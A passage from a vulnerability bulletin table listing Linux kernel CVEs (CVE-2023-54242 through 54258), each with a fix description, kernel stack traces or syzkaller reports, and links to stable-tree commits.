[ 521.458220] submit_bio+0x43/0x80 [ 521.458660] ext4_io_submit+0x23/0x80 [ 521.459116] ext4_do_writepages+0x40a/0xd00 [ 521.459596] ext4_writepages+0x65/0x100 [ 521.460050] do_writepages+0xb7/0x1c0 [ 521.460492] __filemap_fdatawrite_range+0xa6/0x100 [ 521.460979] file_write_and_wait_range+0xbf/0x140 [ 521.461452] ext4_sync_file+0x105/0x340 [ 521.461882] __x64_sys_fsync+0x67/0x100 [ 521.462305] ? syscall_exit_to_user_mode+0x2c/0x1c0 [ 521.462768] do_syscall_64+0x3b/0xc0 [ 521.463165] entry_SYSCALL_64_after_hwframe+0x5a/0xc4 [ 521.463621] RIP: 0033:0x5640b6c56590 [ 521.464006] Code: 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 80 3d 71 70 0e 00 00 74 17 b8 4a 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 48 c3 0f 1f 80 00 00 00 00 48 83 ec 18 89 7c | 2025-12-30 | not yet calculated | CVE-2023-54242 | https://git.kernel.org/stable/c/1655cfc85250a224b0d9486c8136baeea33b9b5c https://git.kernel.org/stable/c/c0346a59d719461248c6dc6f21c9e55ef836b66f https://git.kernel.org/stable/c/e53413f8deedf738a6782cc14cc00bd5852ccf18 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: ebtables: fix table blob use-after-free We are not allowed to return an error at this point. Looking at the code it looks like ret is always 0 at this point, but its not. t = find_table_lock(net, repl->name, &ret, &ebt_mutex); ... this can return a valid table, with ret != 0. This bug causes update of table->private with the new blob, but then frees the blob right away in the caller. Syzbot report: BUG: KASAN: vmalloc-out-of-bounds in __ebt_unregister_table+0xc00/0xcd0 net/bridge/netfilter/ebtables.c:1168 Read of size 4 at addr ffffc90005425000 by task kworker/u4:4/74 Workqueue: netns cleanup_net Call Trace: kasan_report+0xbf/0x1f0 mm/kasan/report.c:517 __ebt_unregister_table+0xc00/0xcd0 net/bridge/netfilter/ebtables.c:1168 ebt_unregister_table+0x35/0x40 net/bridge/netfilter/ebtables.c:1372 ops_exit_list+0xb0/0x170 net/core/net_namespace.c:169 cleanup_net+0x4ee/0xb10 net/core/net_namespace.c:613 ... ip(6)tables appears to be ok (ret should be 0 at this point) but make this more obvious. | 2025-12-30 | not yet calculated | CVE-2023-54243 | https://git.kernel.org/stable/c/9060abce3305ab2354c892c09d5689df51486df5 https://git.kernel.org/stable/c/dbb3cbbf03b3c52cb390fabec357f1e4638004f5 https://git.kernel.org/stable/c/3dd6ac973351308d4117eda32298a9f1d68764fd https://git.kernel.org/stable/c/cda0e0243bd3c04008fcd37a46b0269fb3c49249 https://git.kernel.org/stable/c/e58a171d35e32e6e8c37cfe0e8a94406732a331f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ACPI: EC: Fix oops when removing custom query handlers When removing custom query handlers, the handler might still be used inside the EC query workqueue, causing a kernel oops if the module holding the callback function was already unloaded. Fix this by flushing the EC query workqueue when removing custom query handlers. Tested on a Acer Travelmate 4002WLMi | 2025-12-30 | not yet calculated | CVE-2023-54244 | https://git.kernel.org/stable/c/130e3eac51912f2c866e7d035992ede25f8feac0 https://git.kernel.org/stable/c/0d528a7c421b1f1772fc1d29370b3b5fc0f42b19 https://git.kernel.org/stable/c/ccae2233e9935a038a35fe8cfd703df905f700e7 https://git.kernel.org/stable/c/066b90bca755f0b876e7b027b75d1796861d6db0 https://git.kernel.org/stable/c/f4a573eed6377d356f835a4b00099d5dacee0da0 https://git.kernel.org/stable/c/86a159fd5bdb01ec34b160cfda1a313b616d9302 https://git.kernel.org/stable/c/fd2c99e81ae0dbdd62a154ef9c77fc01715cc020 https://git.kernel.org/stable/c/e5b492c6bb900fcf9722e05f4a10924410e170c1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: codecs: tx-macro: Fix for KASAN: slab-out-of-bounds When we run syzkaller we get below Out of Bound. "KASAN: slab-out-of-bounds Read in regcache_flat_read" Below is the backtrace of the issue: dump_backtrace+0x0/0x4c8 show_stack+0x34/0x44 dump_stack_lvl+0xd8/0x118 print_address_description+0x30/0x2d8 kasan_report+0x158/0x198 __asan_report_load4_noabort+0x44/0x50 regcache_flat_read+0x10c/0x110 regcache_read+0xf4/0x180 _regmap_read+0xc4/0x278 _regmap_update_bits+0x130/0x290 regmap_update_bits_base+0xc0/0x15c snd_soc_component_update_bits+0xa8/0x22c snd_soc_component_write_field+0x68/0xd4 tx_macro_digital_mute+0xec/0x140 Actually There is no need to have decimator with 32 bits. By limiting the variable with short type u8 issue is resolved. | 2025-12-30 | not yet calculated | CVE-2023-54245 | https://git.kernel.org/stable/c/da35a4e6eee5d73886312e85322a6e97df901987 https://git.kernel.org/stable/c/57f9a9a232bde7abfe49c3072b29a255da9ba891 https://git.kernel.org/stable/c/b0cd740a31412340fead50e69e4fe9bc3781c754 https://git.kernel.org/stable/c/e5e7e398f6bb7918dab0612eb6991f7bae95520d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rcuscale: Move rcu_scale_writer() schedule_timeout_uninterruptible() to _idle() The rcuscale.holdoff module parameter can be used to delay the start of rcu_scale_writer() kthread. However, the hung-task timeout will trigger when the timeout specified by rcuscale.holdoff is greater than hung_task_timeout_secs: runqemu kvm nographic slirp qemuparams="-smp 4 -m 2048M" bootparams="rcuscale.shutdown=0 rcuscale.holdoff=300" [ 247.071753] INFO: task rcu_scale_write:59 blocked for more than 122 seconds. [ 247.072529] Not tainted 6.4.0-rc1-00134-gb9ed6de8d4ff #7 [ 247.073400] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 247.074331] task:rcu_scale_write state:D stack:30144 pid:59 ppid:2 flags:0x00004000 [ 247.075346] Call Trace: [ 247.075660] <TASK> [ 247.075965] __schedule+0x635/0x1280 [ 247.076448] ? __pfx___schedule+0x10/0x10 [ 247.076967] ? schedule_timeout+0x2dc/0x4d0 [ 247.077471] ? __pfx_lock_release+0x10/0x10 [ 247.078018] ? enqueue_timer+0xe2/0x220 [ 247.078522] schedule+0x84/0x120 [ 247.078957] schedule_timeout+0x2e1/0x4d0 [ 247.079447] ? __pfx_schedule_timeout+0x10/0x10 [ 247.080032] ? __pfx_rcu_scale_writer+0x10/0x10 [ 247.080591] ? __pfx_process_timeout+0x10/0x10 [ 247.081163] ? __pfx_sched_set_fifo_low+0x10/0x10 [ 247.081760] ? __pfx_rcu_scale_writer+0x10/0x10 [ 247.082287] rcu_scale_writer+0x6b1/0x7f0 [ 247.082773] ? mark_held_locks+0x29/0xa0 [ 247.083252] ? __pfx_rcu_scale_writer+0x10/0x10 [ 247.083865] ? __pfx_rcu_scale_writer+0x10/0x10 [ 247.084412] kthread+0x179/0x1c0 [ 247.084759] ? __pfx_kthread+0x10/0x10 [ 247.085098] ret_from_fork+0x2c/0x50 [ 247.085433] </TASK> This commit therefore replaces schedule_timeout_uninterruptible() with schedule_timeout_idle(). | 2025-12-30 | not yet calculated | CVE-2023-54246 | https://git.kernel.org/stable/c/55887adc76e19aec9763186e2c1d0a3481d20e96 https://git.kernel.org/stable/c/4f03fba096bfded90e0d71eba8839a46922164d1 https://git.kernel.org/stable/c/83ed0cdb6ae0383dd14b02375c353773836884ed https://git.kernel.org/stable/c/9416dccb31fdb190d25d57e97674f232651f6560 https://git.kernel.org/stable/c/e60c122a1614b4f65b29a7bef9d83b9fd30e937a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Silence a warning in btf_type_id_size() syzbot reported a warning in [1] with the following stacktrace: WARNING: CPU: 0 PID: 5005 at kernel/bpf/btf.c:1988 btf_type_id_size+0x2d9/0x9d0 kernel/bpf/btf.c:1988 ... RIP: 0010:btf_type_id_size+0x2d9/0x9d0 kernel/bpf/btf.c:1988 ... Call Trace: <TASK> map_check_btf kernel/bpf/syscall.c:1024 [inline] map_create+0x1157/0x1860 kernel/bpf/syscall.c:1198 __sys_bpf+0x127f/0x5420 kernel/bpf/syscall.c:5040 __do_sys_bpf kernel/bpf/syscall.c:5162 [inline] __se_sys_bpf kernel/bpf/syscall.c:5160 [inline] __x64_sys_bpf+0x79/0xc0 kernel/bpf/syscall.c:5160 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd With the following btf [1] DECL_TAG 'a' type_id=4 component_idx=-1 [2] PTR '(anon)' type_id=0 [3] TYPE_TAG 'a' type_id=2 [4] VAR 'a' type_id=3, linkage=static and when the bpf_attr.btf_key_type_id = 1 (DECL_TAG), the following WARN_ON_ONCE in btf_type_id_size() is triggered: if (WARN_ON_ONCE(!btf_type_is_modifier(size_type) && !btf_type_is_var(size_type))) return NULL; Note that 'return NULL' is the correct behavior as we don't want a DECL_TAG type to be used as a btf_{key,value}_type_id even for the case like 'DECL_TAG -> STRUCT'. So there is no correctness issue here, we just want to silence warning. To silence the warning, I added DECL_TAG as one of kinds in btf_type_nosize() which will cause btf_type_id_size() returning NULL earlier without the warning. [1] https://lore.kernel.org/bpf/000000000000e0df8d05fc75ba86@google.com/ | 2025-12-30 | not yet calculated | CVE-2023-54247 | https://git.kernel.org/stable/c/61f4bd46a03a81865aca3bcbad2f7b7032fb3160 https://git.kernel.org/stable/c/7c4f5ab63e7962812505cbd38cc765168a223acb https://git.kernel.org/stable/c/e6c2f594ed961273479505b42040782820190305 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Add check for kmemdup Since the kmemdup may return NULL pointer, it should be better to add check for the return value in order to avoid NULL pointer dereference. | 2025-12-30 | not yet calculated | CVE-2023-54248 | https://git.kernel.org/stable/c/952bbfcedbf895963509861e55a6e4fc105eb842 https://git.kernel.org/stable/c/7898db22ed6cee909513cf4935b5f9f0298b74f0 https://git.kernel.org/stable/c/9f36704a58adade3b0216f8a3fa5503db4517208 https://git.kernel.org/stable/c/cdcdfd57f4c701f832787da1309cc6687917d783 https://git.kernel.org/stable/c/e6c3cef24cb0d045f99d5cb039b344874e3cfd74 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bus: mhi: ep: Only send -ENOTCONN status if client driver is available For the STOP and RESET commands, only send the channel disconnect status -ENOTCONN if client driver is available. Otherwise, it will result in null pointer dereference. | 2025-12-30 | not yet calculated | CVE-2023-54249 | https://git.kernel.org/stable/c/353aea15d6edbd4e69e039356a1bd3e641f7d952 https://git.kernel.org/stable/c/860ad591056d7e4dc30bc130b6ec6e6d70930c85 https://git.kernel.org/stable/c/e6cebcc27519dcf1652e604c73b9fd4f416987c0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: avoid out of bounds access in decode_preauth_ctxt() Confirm that the accessed pneg_ctxt->HashAlgorithms address sits within the SMB request boundary; deassemble_neg_contexts() only checks that the eight byte smb2_neg_context header + (client controlled) DataLength are within the packet boundary, which is insufficient. Checking for sizeof(struct smb2_preauth_neg_context) is overkill given that the type currently assumes SMB311_SALT_SIZE bytes of trailing Salt. | 2025-12-30 | not yet calculated | CVE-2023-54250 | https://git.kernel.org/stable/c/39f5b4b313b445c980a2a295bed28228c29228ed https://git.kernel.org/stable/c/a2f6ded41bec1d3be643c80a5eb97f1680309001 https://git.kernel.org/stable/c/f02edb9debbd36f44efa7567031485892c7df60d https://git.kernel.org/stable/c/e7067a446264a7514fa1cfaa4052cdb6803bc6a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: taprio: Limit TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME to INT_MAX. syzkaller found zero division error [0] in div_s64_rem() called from get_cycle_time_elapsed(), where sched->cycle_time is the divisor. We have tests in parse_taprio_schedule() so that cycle_time will never be 0, and actually cycle_time is not 0 in get_cycle_time_elapsed(). The problem is that the types of divisor are different; cycle_time is s64, but the argument of div_s64_rem() is s32. syzkaller fed this input and 0x100000000 is cast to s32 to be 0. @TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME={0xc, 0x8, 0x100000000} We use s64 for cycle_time to cast it to ktime_t, so let's keep it and set max for cycle_time. While at it, we prevent overflow in setup_txtime() and add another test in parse_taprio_schedule() to check if cycle_time overflows. Also, we add a new tdc test case for this issue. [0]: divide error: 0000 [#1] PREEMPT SMP KASAN NOPTI CPU: 1 PID: 103 Comm: kworker/1:3 Not tainted 6.5.0-rc1-00330-g60cc1f7d0605 #3 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 Workqueue: ipv6_addrconf addrconf_dad_work RIP: 0010:div_s64_rem include/linux/math64.h:42 [inline] RIP: 0010:get_cycle_time_elapsed net/sched/sch_taprio.c:223 [inline] RIP: 0010:find_entry_to_transmit+0x252/0x7e0 net/sched/sch_taprio.c:344 Code: 3c 02 00 0f 85 5e 05 00 00 48 8b 4c 24 08 4d 8b bd 40 01 00 00 48 8b 7c 24 48 48 89 c8 4c 29 f8 48 63 f7 48 99 48 89 74 24 70 <48> f7 fe 48 29 d1 48 8d 04 0f 49 89 cc 48 89 44 24 20 49 8d 85 10 RSP: 0018:ffffc90000acf260 EFLAGS: 00010206 RAX: 177450e0347560cf RBX: 0000000000000000 RCX: 177450e0347560cf RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000100000000 RBP: 0000000000000056 R08: 0000000000000000 R09: ffffed10020a0934 R10: ffff8880105049a7 R11: ffff88806cf3a520 R12: ffff888010504800 R13: ffff88800c00d800 R14: ffff8880105049a0 R15: 0000000000000000 FS: 0000000000000000(0000) GS:ffff88806cf00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f0edf84f0e8 CR3: 000000000d73c002 CR4: 0000000000770ee0 PKRU: 55555554 Call Trace: <TASK> get_packet_txtime net/sched/sch_taprio.c:508 [inline] taprio_enqueue_one+0x900/0xff0 net/sched/sch_taprio.c:577 taprio_enqueue+0x378/0xae0 net/sched/sch_taprio.c:658 dev_qdisc_enqueue+0x46/0x170 net/core/dev.c:3732 __dev_xmit_skb net/core/dev.c:3821 [inline] __dev_queue_xmit+0x1b2f/0x3000 net/core/dev.c:4169 dev_queue_xmit include/linux/netdevice.h:3088 [inline] neigh_resolve_output net/core/neighbour.c:1552 [inline] neigh_resolve_output+0x4a7/0x780 net/core/neighbour.c:1532 neigh_output include/net/neighbour.h:544 [inline] ip6_finish_output2+0x924/0x17d0 net/ipv6/ip6_output.c:135 __ip6_finish_output+0x620/0xaa0 net/ipv6/ip6_output.c:196 ip6_finish_output net/ipv6/ip6_output.c:207 [inline] NF_HOOK_COND include/linux/netfilter.h:292 [inline] ip6_output+0x206/0x410 net/ipv6/ip6_output.c:228 dst_output include/net/dst.h:458 [inline] NF_HOOK.constprop.0+0xea/0x260 include/linux/netfilter.h:303 ndisc_send_skb+0x872/0xe80 net/ipv6/ndisc.c:508 ndisc_send_ns+0xb5/0x130 net/ipv6/ndisc.c:666 addrconf_dad_work+0xc14/0x13f0 net/ipv6/addrconf.c:4175 process_one_work+0x92c/0x13a0 kernel/workqueue.c:2597 worker_thread+0x60f/0x1240 kernel/workqueue.c:2748 kthread+0x2fe/0x3f0 kernel/kthread.c:389 ret_from_fork+0x2c/0x50 arch/x86/entry/entry_64.S:308 </TASK> Modules linked in: | 2025-12-30 | not yet calculated | CVE-2023-54251 | https://git.kernel.org/stable/c/f04f6d9b3b060f7e11219a65a76da65f1489e391 https://git.kernel.org/stable/c/0b45af982a4df0b14fb8669ee2a871cfdfa6a39c https://git.kernel.org/stable/c/57b3fe08ae06ef11af007b4a182629b12a961e30 https://git.kernel.org/stable/c/e739718444f7bf2fa3d70d101761ad83056ca628 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/x86: think-lmi: Fix memory leaks when parsing ThinkStation WMI strings My previous commit introduced a memory leak where the item allocated from tlmi_setting was not freed. This commit also renames it to avoid confusion with the similarly name variable in the same function. | 2025-12-30 | not yet calculated | CVE-2023-54252 | https://git.kernel.org/stable/c/cccdb30935c82be805d3362a15680b95d5cb3ee0 https://git.kernel.org/stable/c/081da7b1c881828244b93b3befb7c18389f696bb https://git.kernel.org/stable/c/43fc0342bac1808fda2b76184e43414727111c6b https://git.kernel.org/stable/c/e7d796fccdc8d17c2d21817ebe4c7bf5bbfe5433 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: set page extent mapped after read_folio in relocate_one_page One of the CI runs triggered the following panic assertion failed: PagePrivate(page) && page->private, in fs/btrfs/subpage.c:229 ------------[ cut here ]------------ kernel BUG at fs/btrfs/subpage.c:229! Internal error: Oops - BUG: 00000000f2000800 [#1] SMP CPU: 0 PID: 923660 Comm: btrfs Not tainted 6.5.0-rc3+ #1 pstate: 61400005 (nZCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--) pc : btrfs_subpage_assert+0xbc/0xf0 lr : btrfs_subpage_assert+0xbc/0xf0 sp : ffff800093213720 x29: ffff800093213720 x28: ffff8000932138b4 x27: 000000000c280000 x26: 00000001b5d00000 x25: 000000000c281000 x24: 000000000c281fff x23: 0000000000001000 x22: 0000000000000000 x21: ffffff42b95bf880 x20: ffff42b9528e0000 x19: 0000000000001000 x18: ffffffffffffffff x17: 667274622f736620 x16: 6e69202c65746176 x15: 0000000000000028 x14: 0000000000000003 x13: 00000000002672d7 x12: 0000000000000000 x11: ffffcd3f0ccd9204 x10: ffffcd3f0554ae50 x9 : ffffcd3f0379528c x8 : ffff800093213428 x7 : 0000000000000000 x6 : ffffcd3f091771e8 x5 : ffff42b97f333948 x4 : 0000000000000000 x3 : 0000000000000000 x2 : 0000000000000000 x1 : ffff42b9556cde80 x0 : 000000000000004f Call trace: btrfs_subpage_assert+0xbc/0xf0 btrfs_subpage_set_dirty+0x38/0xa0 btrfs_page_set_dirty+0x58/0x88 relocate_one_page+0x204/0x5f0 relocate_file_extent_cluster+0x11c/0x180 relocate_data_extent+0xd0/0xf8 relocate_block_group+0x3d0/0x4e8 btrfs_relocate_block_group+0x2d8/0x490 btrfs_relocate_chunk+0x54/0x1a8 btrfs_balance+0x7f4/0x1150 btrfs_ioctl+0x10f0/0x20b8 __arm64_sys_ioctl+0x120/0x11d8 invoke_syscall.constprop.0+0x80/0xd8 do_el0_svc+0x6c/0x158 el0_svc+0x50/0x1b0 el0t_64_sync_handler+0x120/0x130 el0t_64_sync+0x194/0x198 Code: 91098021 b0007fa0 91346000 97e9c6d2 (d4210000) This is the same problem outlined in 17b17fcd6d44 ("btrfs: set_page_extent_mapped after read_folio in btrfs_cont_expand") , and the fix is the same. I originally looked for the same pattern elsewhere in our code, but mistakenly skipped over this code because I saw the page cache readahead before we set_page_extent_mapped, not realizing that this was only in the !page case, that we can still end up with a !uptodate page and then do the btrfs_read_folio further down. The fix here is the same as the above mentioned patch, move the set_page_extent_mapped call to after the btrfs_read_folio() block to make sure that we have the subpage blocksize stuff setup properly before using the page. | 2025-12-30 | not yet calculated | CVE-2023-54253 | https://git.kernel.org/stable/c/08daa38ca212d87f77beae839bc9be71079c7abf https://git.kernel.org/stable/c/9d1e020ed9649cf140fcfafd052cfdcce9e9d67d https://git.kernel.org/stable/c/e7f1326cc24e22b38afc3acd328480a1183f9e79 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/ttm: Don't leak a resource on eviction error On eviction errors other than -EMULTIHOP we were leaking a resource. Fix. v2: - Avoid yet another goto (Andi Shyti) | 2025-12-30 | not yet calculated | CVE-2023-54254 | https://git.kernel.org/stable/c/7738335d73d0686ec8995e0448e5d1b48cffb2a4 https://git.kernel.org/stable/c/e9c44738cb1f537b177cc1beabcf6913690460cd https://git.kernel.org/stable/c/6aea0032380bbb1efebd598ad733d16925167921 https://git.kernel.org/stable/c/e8188c461ee015ba0b9ab2fc82dbd5ebca5a5532 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sh: dma: Fix DMA channel offset calculation Various SoCs of the SH3, SH4 and SH4A family, which use this driver, feature a differing number of DMA channels, which can be distributed between up to two DMAC modules. The existing implementation fails to correctly accommodate for all those variations, resulting in wrong channel offset calculations and leading to kernel panics. Rewrite dma_base_addr() in order to properly calculate channel offsets in a DMAC module. Fix dmaor_read_reg() and dmaor_write_reg(), so that the correct DMAC module base is selected for the DMAOR register. | 2025-12-30 | not yet calculated | CVE-2023-54255 | https://git.kernel.org/stable/c/bca700b48c72f4ffeee977a2ed0eb4a6b4b7b8ad https://git.kernel.org/stable/c/479380acfa63247b5ac62476138f847aefc62692 https://git.kernel.org/stable/c/4989627157735c1f1619f08e5bc1592418e7c878 https://git.kernel.org/stable/c/d1c946552af299f4fa85bf7da15e328123771128 https://git.kernel.org/stable/c/196f6c71905aa384c0177acf194a1144d480333b https://git.kernel.org/stable/c/8fb11fa4805699c6b73a9c8a9d45807f9874abe3 https://git.kernel.org/stable/c/e9e33faea104381bac80ac79328f0540fc2969f2 https://git.kernel.org/stable/c/e82e47584847129a20b8c9f4a1dcde09374fb0e0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: macb: fix a memory corruption in extended buffer descriptor mode For quite some time we were chasing a bug which looked like a sudden permanent failure of networking and mmc on some of our devices. The bug was very sensitive to any software changes and even more to any kernel debug options. Finally we got a setup where the problem was reproducible with CONFIG_DMA_API_DEBUG=y and it revealed the issue with the rx dma: [ 16.992082] ------------[ cut here ]------------ [ 16.996779] DMA-API: macb ff0b0000.ethernet: device driver tries to free DMA memory it has not allocated [device address=0x0000000875e3e244] [size=1536 bytes] [ 17.011049] WARNING: CPU: 0 PID: 85 at kernel/dma/debug.c:1011 check_unmap+0x6a0/0x900 [ 17.018977] Modules linked in: xxxxx [ 17.038823] CPU: 0 PID: 85 Comm: irq/55-8000f000 Not tainted 5.4.0 #28 [ 17.045345] Hardware name: xxxxx [ 17.049528] pstate: 60000005 (nZCv daif -PAN -UAO) [ 17.054322] pc : check_unmap+0x6a0/0x900 [ 17.058243] lr : check_unmap+0x6a0/0x900 [ 17.062163] sp : ffffffc010003c40 [ 17.065470] x29: ffffffc010003c40 x28: 000000004000c03c [ 17.070783] x27: ffffffc010da7048 x26: ffffff8878e38800 [ 17.076095] x25: ffffff8879d22810 x24: ffffffc010003cc8 [ 17.081407] x23: 0000000000000000 x22: ffffffc010a08750 [ 17.086719] x21: ffffff8878e3c7c0 x20: ffffffc010acb000 [ 17.092032] x19: 0000000875e3e244 x18: 0000000000000010 [ 17.097343] x17: 0000000000000000 x16: 0000000000000000 [ 17.102647] x15: ffffff8879e4a988 x14: 0720072007200720 [ 17.107959] x13: 0720072007200720 x12: 0720072007200720 [ 17.113261] x11: 0720072007200720 x10: 0720072007200720 [ 17.118565] x9 : 0720072007200720 x8 : 000000000000022d [ 17.123869] x7 : 0000000000000015 x6 : 0000000000000098 [ 17.129173] x5 : 0000000000000000 x4 : 0000000000000000 [ 17.134475] x3 : 00000000ffffffff x2 : ffffffc010a1d370 [ 17.139778] x1 : b420c9d75d27bb00 x0 : 0000000000000000 [ 17.145082] Call trace: [ 17.147524] check_unmap+0x6a0/0x900 [ 17.151091] debug_dma_unmap_page+0x88/0x90 [ 17.155266] gem_rx+0x114/0x2f0 [ 17.158396] macb_poll+0x58/0x100 [ 17.161705] net_rx_action+0x118/0x400 [ 17.165445] __do_softirq+0x138/0x36c [ 17.169100] irq_exit+0x98/0xc0 [ 17.172234] __handle_domain_irq+0x64/0xc0 [ 17.176320] gic_handle_irq+0x5c/0xc0 [ 17.179974] el1_irq+0xb8/0x140 [ 17.183109] xiic_process+0x5c/0xe30 [ 17.186677] irq_thread_fn+0x28/0x90 [ 17.190244] irq_thread+0x208/0x2a0 [ 17.193724] kthread+0x130/0x140 [ 17.196945] ret_from_fork+0x10/0x20 [ 17.200510] ---[ end trace 7240980785f81d6f ]--- [ 237.021490] ------------[ cut here ]------------ [ 237.026129] DMA-API: exceeded 7 overlapping mappings of cacheline 0x0000000021d79e7b [ 237.033886] WARNING: CPU: 0 PID: 0 at kernel/dma/debug.c:499 add_dma_entry+0x214/0x240 [ 237.041802] Modules linked in: xxxxx [ 237.061637] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G W 5.4.0 #28 [ 237.068941] Hardware name: xxxxx [ 237.073116] pstate: 80000085 (Nzcv daIf -PAN -UAO) [ 237.077900] pc : add_dma_entry+0x214/0x240 [ 237.081986] lr : add_dma_entry+0x214/0x240 [ 237.086072] sp : ffffffc010003c30 [ 237.089379] x29: ffffffc010003c30 x28: ffffff8878a0be00 [ 237.094683] x27: 0000000000000180 x26: ffffff8878e387c0 [ 237.099987] x25: 0000000000000002 x24: 0000000000000000 [ 237.105290] x23: 000000000000003b x22: ffffffc010a0fa00 [ 237.110594] x21: 0000000021d79e7b x20: ffffffc010abe600 [ 237.115897] x19: 00000000ffffffef x18: 0000000000000010 [ 237.121201] x17: 0000000000000000 x16: 0000000000000000 [ 237.126504] x15: ffffffc010a0fdc8 x14: 0720072007200720 [ 237.131807] x13: 0720072007200720 x12: 0720072007200720 [ 237.137111] x11: 0720072007200720 x10: 0720072007200720 [ 237.142415] x9 : 0720072007200720 x8 : 0000000000000259 [ 237.147718] x7 : 0000000000000001 x6 : 0000000000000000 [ 237.15302 ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54257 | https://git.kernel.org/stable/c/dd7a49a3eaf723a01b2fdf153f98450a82b0b0fe https://git.kernel.org/stable/c/82e626af24683e01211abe66cec27a387f8f17c9 https://git.kernel.org/stable/c/7169d1638824c4bf7e0fe0baad381ddec861fa70 https://git.kernel.org/stable/c/1bec9da233f779e7b6954ee07ad7e6d8f2a4dd83 https://git.kernel.org/stable/c/7ccc58a1a75601c936069d4a0741940623990ade https://git.kernel.org/stable/c/9412a9bf5952cdf5d0f736cc1e8c68fd366c2d47 https://git.kernel.org/stable/c/5dcf3a6843d0d7cc76960fbe8511d425f217744c https://git.kernel.org/stable/c/e8b74453555872851bdd7ea43a7c0ec39659834f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: fix potential oops in cifs_oplock_break With deferred close we can have closes that race with lease breaks, and so with the current checks for whether to send the lease response, oplock_response(), this can mean that an unmount (kill_sb) can occur just before we were checking if the tcon->ses is valid. See below: [Fri Aug 4 04:12:50 2023] RIP: 0010:cifs_oplock_break+0x1f7/0x5b0 [cifs] [Fri Aug 4 04:12:50 2023] Code: 7d a8 48 8b 7d c0 c0 e9 02 48 89 45 b8 41 89 cf e8 3e f5 ff ff 4c 89 f7 41 83 e7 01 e8 82 b3 03 f2 49 8b 45 50 48 85 c0 74 5e <48> 83 78 60 00 74 57 45 84 ff 75 52 48 8b 43 98 48 83 eb 68 48 39 [Fri Aug 4 04:12:50 2023] RSP: 0018:ffffb30607ddbdf8 EFLAGS: 00010206 [Fri Aug 4 04:12:50 2023] RAX: 632d223d32612022 RBX: ffff97136944b1e0 RCX: 0000000080100009 [Fri Aug 4 04:12:50 2023] RDX: 0000000000000001 RSI: 0000000080100009 RDI: ffff97136944b188 [Fri Aug 4 04:12:50 2023] RBP: ffffb30607ddbe58 R08: 0000000000000001 R09: ffffffffc08e0900 [Fri Aug 4 04:12:50 2023] R10: 0000000000000001 R11: 000000000000000f R12: ffff97136944b138 [Fri Aug 4 04:12:50 2023] R13: ffff97149147c000 R14: ffff97136944b188 R15: 0000000000000000 [Fri Aug 4 04:12:50 2023] FS: 0000000000000000(0000) GS:ffff9714f7c00000(0000) knlGS:0000000000000000 [Fri Aug 4 04:12:50 2023] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [Fri Aug 4 04:12:50 2023] CR2: 00007fd8de9c7590 CR3: 000000011228e000 CR4: 0000000000350ef0 [Fri Aug 4 04:12:50 2023] Call Trace: [Fri Aug 4 04:12:50 2023] <TASK> [Fri Aug 4 04:12:50 2023] process_one_work+0x225/0x3d0 [Fri Aug 4 04:12:50 2023] worker_thread+0x4d/0x3e0 [Fri Aug 4 04:12:50 2023] ? process_one_work+0x3d0/0x3d0 [Fri Aug 4 04:12:50 2023] kthread+0x12a/0x150 [Fri Aug 4 04:12:50 2023] ? set_kthread_struct+0x50/0x50 [Fri Aug 4 04:12:50 2023] ret_from_fork+0x22/0x30 [Fri Aug 4 04:12:50 2023] </TASK> To fix this change the ordering of the checks before sending the oplock_response to first check if the openFileList is empty. | 2025-12-30 | not yet calculated | CVE-2023-54258 | https://git.kernel.org/stable/c/b99f490ea87ebcca3a429fd8837067feb56a4c7c https://git.kernel.org/stable/c/5ee28bcfbaacf289eb25c662a2862542ea6ce6a7 https://git.kernel.org/stable/c/6b67a6d2e50634fe127e656147c81915955e9f5e https://git.kernel.org/stable/c/e8f5f849ffce24490eb9449e98312b66c0dba76f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: soundwire: bus: Fix unbalanced pm_runtime_put() causing usage count underflow This reverts commit 443a98e649b4 ("soundwire: bus: use pm_runtime_resume_and_get()") Change calls to pm_runtime_resume_and_get() back to pm_runtime_get_sync(). This fixes a usage count underrun caused by doing a pm_runtime_put() even though pm_runtime_resume_and_get() returned an error. The three affected functions ignore -EACCES error from trying to get pm_runtime, and carry on, including a put at the end of the function. But pm_runtime_resume_and_get() does not increment the usage count if it returns an error. So in the -EACCES case you must not call pm_runtime_put(). The documentation for pm_runtime_get_sync() says: "Consider using pm_runtime_resume_and_get() ... as this is likely to result in cleaner code." In this case I don't think it results in cleaner code because the pm_runtime_put() at the end of the function would have to be conditional on the return value from pm_runtime_resume_and_get() at the top of the function. pm_runtime_get_sync() doesn't have this problem because it always increments the count, 